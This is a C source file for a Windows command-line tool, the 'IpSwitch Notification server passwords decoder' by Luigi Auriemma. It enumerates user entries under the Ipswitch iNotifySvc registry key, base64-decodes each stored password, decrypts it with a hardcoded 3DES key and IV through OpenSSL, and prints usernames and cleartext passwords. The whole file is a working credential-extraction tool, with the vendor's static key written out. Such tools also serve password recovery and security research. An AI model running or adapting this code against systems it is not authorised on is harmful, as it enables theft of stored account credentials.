/*
    Copyright 2004,2005,2006 Luigi Auriemma

    This program is free software; you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation; either version 2 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program; if not, write to the Free Software
    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307 USA

    http://www.gnu.org/licenses/gpl.txt

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#include <openssl/evp.h>



#define VER         "0.1.1"
#define KEYPATH     "Software\\Ipswitch\\iNotifySvc\\Users"
#define BUFFSZ      8192
#define B64DECX     bb = *bf; \
                    for(; \
                    bb && \
                    ((bb == ' ') || \
                    (bb == '\t') || \
                    (bb == '\r') || \
                    (bb == '\n')); \
                    bf++);



void ipswitch_evp_pwd(unsigned char *pwd, int len);
unsigned char *Base64Decode(unsigned char *buf, unsigned char *ret);



int main(void) {
    HKEY    key,
            keypwd;
    unsigned char  keybuff[sizeof(KEYPATH) + BUFFSZ],
            value[BUFFSZ + 1],
            *ptr;
    int     bufflen,
            valuelen,
            k;


    setbuf(stdout, NULL);

    fputs("\n"
        "IpSwitch Notification server passwords decoder "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(RegOpenKeyEx(HKEY_LOCAL_MACHINE, KEYPATH, 0, KEY_READ, &key)) {
        fputs("\n"
            "Error: registry key has not been found\n"
            "\n"
            "    Press RETURN to exit\n", stdout);
        fgetc(stdin);
        exit(1);
    }

    strcpy(keybuff, KEYPATH);
    ptr = keybuff + sizeof(KEYPATH) - 1;
    *ptr++ = '\\';
    k = 0;
    while(1) {
        bufflen = BUFFSZ;
        if(RegEnumKeyEx(
            key,
            k++,
            ptr,
            (void *)&bufflen,
            NULL,
            NULL,
            NULL,
            NULL)) break;

        printf("\n  Username:   %s\n", ptr);

        RegOpenKeyEx(HKEY_LOCAL_MACHINE, keybuff, 0, KEY_READ, &keypwd);
        valuelen = BUFFSZ;
        if(RegQueryValueEx(
            keypwd,
            "PassWord",
            NULL,
            NULL,
            value,
            (void *)&valuelen)) continue;

        ipswitch_evp_pwd(value, valuelen);
        printf("  Password:   %s\n", value);
        RegCloseKey(keypwd);
    }
    RegCloseKey(key);

    fputs("\n\n   Press RETURN to exit\n", stdout);
    fgetc(stdin);
    return(0);
}



void ipswitch_evp_pwd(unsigned char *pwd, int len) {
    unsigned char       key[] =
                        "\xE1\xF0\xC3\xD2\xA5\xB4\x87\x96\x69\x78\x4B\x5A\x2D\x3C\x0F\x1E"
                        "\x34\x12\x78\x56\xab\x90\xef\xcd";
    EVP_CIPHER_CTX      ctx;

    if(*pwd != '_') return;
    len = Base64Decode(pwd + 1, pwd) - pwd;
    EVP_CIPHER_CTX_init(&ctx);
    EVP_DecryptInit(&ctx, EVP_des_ede3_cbc(), key, key + 16);
    EVP_DecryptUpdate(&ctx, pwd, &len, pwd, len);
    EVP_CIPHER_CTX_cleanup(&ctx);
}



unsigned char *Base64Decode(unsigned char *buf, unsigned char *ret) {
    int             c,
                    d,
                    i,
                    *Base;
    unsigned char   bb,
                    *bf,
                    *rf;

    if(!*buf) {
        *ret = 0;
        return(ret);
    }

    Base = (int *)malloc(sizeof(int) << 8);
    if(!Base) {
        strcpy(ret, buf);
        return(ret);
    }
    for(i = 0; i < 26; i++) {
        Base['A' + i] = i;
        Base['a' + i] = i + 26;
    }
    for(i = 0; i < 10; i++) {
        Base['0' + i] = i + 52;
    }
    Base['+'] = 62;
    Base['/'] = 63;

    bf = buf;
    rf = ret;
    B64DECX;
    while(1) {
        bb = *bf++;
        if((bb == '=') || !bb) break;
        c = Base[bb];

        B64DECX;
        bb = *bf++;
        if((bb == '=') || !bb) break;
        d = Base[bb];
        *rf++ = (c << 2) | (d >> 4);

        B64DECX;
        bb = *bf++;
        if((bb == '=') || !bb) break;
        c = Base[bb];
        *rf++ = ((d & 0xF) << 4) | (c >> 2);

        B64DECX;
        bb = *bf++;
        if((bb == '=') || !bb) break;
        *rf++ = ((c & 0x3) << 6) | Base[bb];
    }
    *rf = 0;
    free(Base);
    return(rf);
}


